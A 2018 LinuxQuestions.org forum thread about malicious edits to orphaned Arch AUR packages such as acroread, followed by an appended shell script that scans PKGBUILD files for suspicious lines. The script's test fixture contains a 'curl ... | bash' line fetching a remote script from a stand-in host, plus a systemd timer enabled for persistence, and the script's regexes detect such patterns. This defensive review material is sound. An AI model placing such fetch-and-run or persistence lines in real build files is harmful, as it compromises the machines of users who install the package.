LinuxQuestions.org
Arch This Forum is for the discussion of Arch Linux.
Old 07-11-2018, 05:13 PM   #1
ChuangTzu
Senior Member
 
Registered: May 2015
Location: Where ever needed
Distribution: Slackware/Salix while testing others
Posts: 1,718

Arch Linux AUR Repository Found to Contain Malware


I attempted to post this in the Linux News section but it appears that it was not approved for posting....

"The Arch Linux user-maintained software repository called AUR has been found to host malware. The discovery was made after a change in one of the package installation instructions was made. This is yet another incident that showcases that Linux users should not explicitly trust user-controlled repositories..."

https://sensorstechforum.com/arch-li...ntain-malware/
https://www.bleepingcomputer.com/new...ge-repository/
https://betanews.com/2018/07/11/arch-linux-malware/
https://www.linuxuprising.com/2018/0...epository.html
 
Old 07-11-2018, 07:06 PM   #2
Timothy Miller
Moderator
 
Registered: Feb 2003
Location: Arizona, USA
Distribution: Debian, EndeavourOS, OpenSUSE, KDE Neon
Posts: 4,003
Blog Entries: 26

I'm an Arch user and I have to say that my level of surprise is...none.
 
Old 07-11-2018, 09:44 PM   #3
un1x
Member
 
Registered: Oct 2015
Posts: 645

NADA on its front page!

https://aur.archlinux.org/

perhaps 'FUD'???
 
Old 07-11-2018, 10:54 PM   #4
syg00
LQ Veteran
 
Registered: Aug 2003
Location: Australia
Distribution: Lots ...
Posts: 21,119

Long time Arch user, and I'm very surprised it didn't make the news on the front page. Seems unless you are subscribed to the AUR specific mail lists you don't need to know.
Bloody strange attitude IMHO.

I don't use AUR much, but it looks like damn near everyone uses one of the helper tools. Myself excluded of course.
 
Old 07-12-2018, 03:29 AM   #5
ondoho
LQ Addict
 
Registered: Dec 2013
Posts: 19,872
Blog Entries: 12

this is FUD, or maybe just trying to blow up what is essentially not news at all.
  • the title is misleading: it's not the AUR itself that's compromised, but one (or several) packages therein
  • that package is acroread. proprietary Adobe software reads & transmits my personal data? can't say i'm surprised...
  • the nature of AUR is such. no need to mention it on the frontpage; everybody who uses AUR packages should know this. excerpt from here:
    Quote:
    Warning: Carefully check all files. Carefully check the PKGBUILD and any .install file for malicious commands. PKGBUILDs are bash scripts containing functions to be executed by makepkg: these functions can contain any valid commands or Bash syntax, so it is totally possible for a PKGBUILD to contain dangerous commands through malice or ignorance on the part of the author. Since makepkg uses fakeroot (and should never be run as root), there is some level of protection but you should never count on it. If in doubt, do not build the package and seek advice on the forums or mailing list.
    I should add: Don't blindly trust binary packages, either.

...or, as ChuangTzu quoted correctly:
This is yet another incident that showcases that Linux users should not explicitly trust user-controlled repositories...

Last edited by ondoho; 07-12-2018 at 03:30 AM.
 
Old 07-12-2018, 02:47 PM   #6
un1x
Member
 
Registered: Oct 2015
Posts: 645

WHY spreading FUD??? nonsense!

Code:
ChuangTzu
"The Arch Linux user-maintained software repository called AUR has been found to host malware. The discovery was made after a change in one of the package installation instructions was made. This is yet another incident that showcases that Linux users should not explicitly trust user-controlled repositories..."
 
Old 07-13-2018, 01:58 AM   #7
ondoho
LQ Addict
 
Registered: Dec 2013
Posts: 19,872
Blog Entries: 12

what happened is someone took over an orphaned package & made malicious changes to the PKGBUILD. the fact that they could do that is totally normal and does NOT indicate that the AUR itself is compromised or anything. nobody claimed that either, but i'm just making sure that people understand what is happening here.

if you know what the AUR is and how it works, this is really no surprise at all.

one is not supposed to trust these packages explicitly.

i usually go by votes & popularity & comments.
if something is off, people notice very quickly (comments) and take appropriate action (thanks to archlinux' concept of Trusted Users this is possible).

Btw, all this was fixed 1-3 days BEFORE these articles even came out.

PS: of the four links in post #1 i found this one most informative. it's all there if one cares to read beyond a few buzzwords.

PPS: my original assessment that it's the acroread program itself that is the malware, was wrong. once again, read the article.

Last edited by ondoho; 07-13-2018 at 02:00 AM.
 
Old 07-13-2018, 08:44 AM   #8
un1x
Member
 
Registered: Oct 2015
Posts: 645

https://distrowatch.com/dwres.php?re...ine&story=6389

Quote:
People who run Arch Linux, or one of its many derivatives, received a reminder last week that while the Arch User Repository (AUR) is a convenient way to access a large number of software packages, the packages in that repository can come from anywhere and should not be blindly trusted. Sensors Tech Forum reports: "Linux users of all distributions have received a major warning not to explicitly trust user-run software repositories following the latest incident related to Arch Linux. The project's user-maintained AUR packages (which stands for Arch User Repository) have been found to host malware code in several instances. Fortunately a code analysis was able to discover the modifications in due time - only several days after the dangerous code was placed in the app installation instructions. The security investigation shows that a malicious user with the nick name xeactor modified on June 7 an orphaned package (software without an active maintainer) called acroread. The changes included a curl script that downloads and runs a script from a remote site. This installs persistent software that reconfigures systemd in order to start periodically. While it appears that they are not a serious threat to the security of the infected hosts, the scripts can be manipulated at any time to include arbitrary code. Two other packages were modified in the same manner." Most Linux distributions have optional add-on repositories where community members can upload scripts or packages. These third-party items should be audited before being installed.
 
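The wiki warning quoted in post #5 ("Carefully check the PKGBUILD and any .install file for malicious commands") and the article quoted in post #8 (a curl line that fetches and runs a remote script, plus systemd persistence) describe what a reviewer should look for before running makepkg. The script below is an added example and is not part of the thread, the Arch wiki, or any AUR helper: it prints every line of a build file that matches one of four review rules and exits non-zero when anything was flagged. The functions audit_pkgbuild and audit_rule, the rule set, and the two fixture files (pkgnames acroread-mock and hello-mock, host example.invalid) are all constructed here; a match means "read this by hand", not "this package is malicious", and a clean run does not mean the package is safe.

```shell
#!/bin/sh
# audit_pkgbuild.sh: constructed example for reviewing AUR build files before makepkg.
# Not from the thread, the Arch wiki, or any AUR helper. It lists lines a reviewer
# should read by hand; it never decides that a package is safe.

AUDIT_HITS=0

# audit_rule FILE REGEX REASON: print every line of FILE matching REGEX, tagged
# with REASON, and add the match count to AUDIT_HITS.
audit_rule() {
    _n=$(grep -cE "$2" "$1" || true)
    [ "$_n" -gt 0 ] || return 0
    grep -nE "$2" "$1" | while IFS= read -r _m; do
        printf '%s: %s: line %s\n' "$1" "$3" "$_m"
    done
    AUDIT_HITS=$((AUDIT_HITS + _n))
}

# audit_pkgbuild FILE: run the rule set; returns 0 if nothing was flagged, 1 otherwise.
audit_pkgbuild() {
    AUDIT_HITS=0
    # 1. A download tool piped straight into a shell (the change the articles describe).
    audit_rule "$1" '(curl|wget)[^|]*\|[[:space:]]*(ba)?sh([[:space:]]|$)' \
        'remote content piped into a shell'
    # 2. Paths under systemd unit directories: legitimate for packages that ship a
    #    unit, but worth confirming that the unit is expected and installs under $pkgdir.
    audit_rule "$1" '/(etc|usr/lib)/systemd/system' 'touches a systemd unit directory'
    # 3. Enabling or starting services from a build or install script (persistence on the host).
    audit_rule "$1" 'systemctl[[:space:]]+(enable|start)' 'enables or starts a service'
    # 4. Decoded or dynamically assembled commands, which hide what actually runs.
    audit_rule "$1" '(base64[[:space:]]+(-d|--decode)|(^|[[:space:];&|])eval[[:space:]])' \
        'decoded or dynamically evaluated command'
    [ "$AUDIT_HITS" -eq 0 ]
}

AUDIT_DIR=$(mktemp -d)

# Constructed fixture: a build file with the kind of additions the thread describes.
# example.invalid never resolves, and the file is only read, never executed.
AUDIT_SAMPLE_BAD="$AUDIT_DIR/PKGBUILD.suspicious"
cat > "$AUDIT_SAMPLE_BAD" <<'EOF'
pkgname=acroread-mock
pkgver=1.0
pkgrel=1
arch=('x86_64')
source=("https://example.invalid/acroread-mock-1.0.tar.gz")
sha256sums=('SKIP')

package() {
    install -Dm755 acroread "$pkgdir/usr/bin/acroread"
    curl -s https://example.invalid/u.sh | bash
    install -Dm644 x.timer "$pkgdir/etc/systemd/system/x.timer"
    systemctl enable x.timer
}
EOF

# Constructed fixture: an ordinary build file with nothing to flag.
AUDIT_SAMPLE_OK="$AUDIT_DIR/PKGBUILD.clean"
cat > "$AUDIT_SAMPLE_OK" <<'EOF'
pkgname=hello-mock
pkgver=1.0
pkgrel=1
arch=('x86_64')
source=("https://example.invalid/hello-mock-1.0.tar.gz")
sha256sums=('0000000000000000000000000000000000000000000000000000000000000000')

package() {
    cd "$srcdir/hello-mock-$pkgver"
    install -Dm755 hello "$pkgdir/usr/bin/hello"
}
EOF

for f in "$AUDIT_SAMPLE_OK" "$AUDIT_SAMPLE_BAD"; do
    if audit_pkgbuild "$f"; then
        echo "$f: nothing flagged"
    else
        echo "$f: $AUDIT_HITS line(s) need manual review"
    fi
done
```

Run it against the PKGBUILD and .install files in a cloned AUR checkout before makepkg; a rule hit is an instruction to open the file and read the surrounding function. The rules are deliberately narrow, so they will miss anything the thread does not describe, which is exactly why the wiki text says to read the whole file rather than rely on a checker.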